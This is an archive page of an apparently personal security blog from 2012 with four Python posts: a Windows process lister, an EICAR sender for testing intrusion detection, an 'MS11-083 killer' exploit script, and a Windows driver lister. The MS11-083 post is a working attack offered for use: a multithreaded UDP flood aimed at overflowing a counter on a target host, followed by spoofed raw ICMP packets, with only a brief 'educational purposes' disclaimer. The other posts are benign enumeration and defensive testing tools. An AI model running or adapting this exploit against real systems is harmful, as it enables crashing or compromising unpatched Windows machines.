______ Y ______
My own personal time capsule.
Tag Archives: windows
PID Enumeration on Windows with pure python ctypes
January 27, 2012
Posted by on Following code will enumerate process ID’s on the current system by calling EnumProcesses from psapi on Windows. Should for for majority of windows distributions that have psapi.dll in %systemroot%.
from ctypes import * psapi = windll.psapi print "[+] PID dumper by Y" print "[+] contact : If you know me then give me a shout" def getListOfProcesses(): max_array = c_ulong * 4096 # define long array to capture all the processes pProcessIds = max_array() # array to store the list of processes pBytesReturned = c_ulong() # the number of bytes returned in the array #EnumProcess psapi.EnumProcesses(byref(pProcessIds), sizeof(pProcessIds), byref(pBytesReturned)) # get the number of returned processes nReturned = pBytesReturned.value/sizeof(c_ulong()) pidProcessArray = [i for i in pProcessIds][:nReturned] for processes in pidProcessArray: print "[+] Running Process PID %d" % processes getListOfProcesses()
IDS/IPS Testing with EICAR
January 26, 2012
Posted by on Following script will attempt to submit common malware string EICAR on multiple ports for IDS/IPS system to alert on in. It can be used to test how well does IDS pick up various malware that can be seen on the wire.
# IMPORTS import socket import httplib,urllib import ftplib import telnetlib # the eicar string to test with EICAR = "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" ############# CONFIGURATION ############# IP = "127.0.0.1" ############# END OF CONF ############# def info(): print "[+] Multi-Protocol EICAR tester by Y" print "[+] contact : If you know me then give me a shout" print "[+] Supports - HTTP, FTP, TELNET, SSL , TCP , UDP , DNS" print "[+] NOTE: Set NC listener on specific ports between the hosts and DIS and watch IDS alerting on protocols" print "[+] Following ports are used: 21(TCP),23(TCP),25(TCP),100(UDP),80(TCP),22(TCP),443(TCP),53(UDP)" def sendHTTP(data,target,port): try: print "[+] Sending HTTP request" conn = httplib.HTTPConnection(target,port) try: print "\t HEAD" conn.request("HEAD",EICAR) except: pass try: print "\t GET" conn.request("GET",EICAR) except: pass try: print "\t POST" params = urllib.urlencode({'eicar': EICAR}) headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"} conn.request("POST", "", params, headers) except: pass try: print "\t PUT" conn.request("PUT",EICAR) except: pass try: print "\t DELETE" conn.request("DELETE",EICAR) except: pass except Exception,e: print "[-] Unable to send HTTP data due to : ",e pass def sendFTP(data,target,port): try: print "[+] Sending FTP request" ftp = ftplib.FTP() ftp.connect(target, port) ftp.putline(data) # send single EICAR request ftp.close() except Exception,e: print "[-] Unable to send FTP data due to : ",e pass def sendTelnet(data,target,port): try: print "[+] Sending TELNET request" tn = telnetlib.Telnet(target,port) tn.write(EICAR) tn.close() except Exception,e: print "[-] Unable to send TELNET data due to : ",e pass def sendSMTP(data,target,port): try: print "[+] Sending SMTP request" tn = telnetlib.Telnet(target,port) tn.write("HELO localhost") tn.write("MAIL FROM: root@localhost") tn.write("RCPT TO: root@localhost") tn.write("DATA \n") tn.write(EICAR) tn.write("\n\t\n\t") tn.write("QUIT") tn.close() except Exception,e: print "[-] Unable to send SMTP data due to : ",e pass def sendSSH(data,targer,port): pass def sendSSL(data,target,port): try: print "[+] Sending HTTP request" conn = httplib.HTTPSConnection(target,port) try: print "\t HEAD" conn.request("HEAD",EICAR) except: pass try: print "\t GET" conn.request("GET",EICAR) except: pass try: print "\t POST" params = urllib.urlencode({'eicar': EICAR}) headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"} conn.request("POST", "", params, headers) except: pass try: print "\t PUT" conn.request("PUT",EICAR) except: pass try: print "\t DELETE" conn.request("DELETE",EICAR) except: pass except Exception,e: print "[-] Unable to send HTTP data due to : ",e pass def sendICMP(data,target): pass def sendRCP(data,target,port): pass def sendTCP(data,target,port): try: print "[+] Sending TCP data " socket.setdefaulttimeout(4) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, int(port))) s.send(data) s.close() except Exception,e: print "[-] Unable to send TCP data due to : ",e pass def sendUDP(data,target,port): try: print "[+] Sending UDP data " sock = socket.socket( socket.AF_INET, socket.SOCK_DGRAM ) sock.sendto( data, (target, port)) except Exception,e: print "[-] Unable to send UDP data due to : ",e pass def sendNETBIOS(data,target,port): pass def sendDNS(data,target,port): try: print "[+] Sending DNS request " sendUDP(data, target, port) # dirty trick except Exception,e: print "[-] Unable to send DNS data due to : ",e pass def end(): print "Done, now review IDS logs for each protocol" def start_test(): info() sendFTP(EICAR, IP, 21) sendTelnet(EICAR, IP, 23) sendSMTP(EICAR, IP, 25) sendUDP(EICAR,IP, 100) sendHTTP(EICAR, IP, 80) sendTCP(EICAR, IP, 22) sendSSL(EICAR, IP, 443) sendDNS(EICAR,IP,53) #TODO: #Protocol play ( these are HPING2 wrappers ) #sendICMP(EICAR,'192.168.2.79') #sendRCP(EICAR, '192.168.2.79', 445) #sendNETBIOS(EICAR, '192.168.2.79', 139) #sendSSH(EICAR, '192.168.2.79', 22) sendDNS(EICAR,IP,53) end() # start_test the test start_test()
MS11-083 killer
January 26, 2012
Posted by on Following code will attempt to exploit the MS11-083 by sending specially crafted packets to closed UDP port ( read more here).
import socket import threading try: from dpkt.ip import IP from dpkt.icmp import ICMP except: print "install dpkt if you want this program to run!" print "[+] MS11-083 killer by Y" print "[+] contact : If you know me then give me a shout" ############ EDIT THIS ################# UDP_IP="192.168.93.15" UDP_PORT=839 MESSAGE="\x44\x44\x44\x44\x44\x44\x44\x44\x44\x00\x00\x00\x00\x00\x00" ThreadCount = 32 ######################################## print " [+]UDP target IP:", UDP_IP print " [+]UDP target port:", UDP_PORT print " [+]UDP payload lenght:", len(MESSAGE) def customPing(UDP_IP,repeat): # craft custom ping dataCC = "\xCC\xCC\xCC\xCC\xCC\xCC" ip = IP(src='\x01\x02\x03\x04', dst=UDP_IP, p=1) icmp = ICMP(type=8, data=ICMP.Echo(id=123, seq=1, data=dataCC)) ip.data = icmp ip.len += len(ip.data) print "[+] Building socket for final ping" s = socket.socket(socket.AF_INET, socket.SOCK_RAW) s.connect((UDP_IP, 1)) # sending packet print "[+] Sending final ping ( debug trap ) " for x in range(10): s.send(str(ip)) try: print "\t[+] Running UDP attack against -> ", UDP_IP , "on port " , UDP_PORT s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) s.setblocking(0) # set non-blocking mode class ThreadClass(threading.Thread): def run(self): c = 0 while c<(4294967296/ThreadCount): # 2^32 requests to overflow the counter s.sendto( MESSAGE, (UDP_IP,UDP_PORT )) # trigger the actual attack via ICMP messages ( the payload can probably trigger command execution !?) print "[+] Triggering actual attack " customPing(UDP_IP,20) for i in range(ThreadCount): t = ThreadClass() t.start() print "[+] Thread ",i," is starting and its name is : " , t.getName() except Exception,e: print " [-] Exception occured, reason : " , e
Note that this code is only for the educational purposes and I do not take the responsibility for any missuses.
Dumping Drivers on Windows
January 16, 2012
Posted by on Ever wonder how to list all the drivers on your windows machine ? Here is a quick answer coded in Python that hopefully can help some people.
from ctypes import * #Windows modules loader kernel32 = windll.kernel32 psapi = windll.psapi class drivers(): def getAllDeviceDrivers(self): lpcbNeeded = c_ulong(0) empty_init_array = c_ulong * 1024 lpImageBase = empty_init_array() drivername_size = c_long() drivername_size.value = 48 if psapi.EnumDeviceDrivers(byref(lpImageBase),sizeof(c_void_p)*1024,byref(lpcbNeeded)): no_drivers = int(lpcbNeeded.value / sizeof(c_void_p)) print "[*] EnumDeviceDrivers: %d modules detected" % no_drivers print "\t[+] Dumping all device drivers" for baseaddy in lpImageBase: drivername = c_char_p("\x00"*drivername_size.value) if baseaddy: psapi.GetDeviceDriverBaseNameA(baseaddy, drivername, drivername_size.value) driverpath = c_char_p("\x00"*drivername_size.value) psapi.GetDeviceDriverFileNameA(baseaddy,driverpath,drivername_size.value) # if we have drivers with addresses allocated within 0x80000000 and 0xFFFFFFFF they loaded directly kernel if baseaddy > 2147483648 and baseaddy < 4294967295: print "\t\t [-] Kernel Driver",drivername.value.lower(),"is located on 0x%08x load path is %s" % (baseaddy,driverpath.value.lower()) else: # user level drivers are within 0x00000000 and 0x7FFFFFFF print "\t\t [-] User Driver",drivername.value.lower(),"is located on 0x%08x load path is %s" % (baseaddy,driverpath.value.lower()) drivers = drivers() drivers.getAllDeviceDrivers()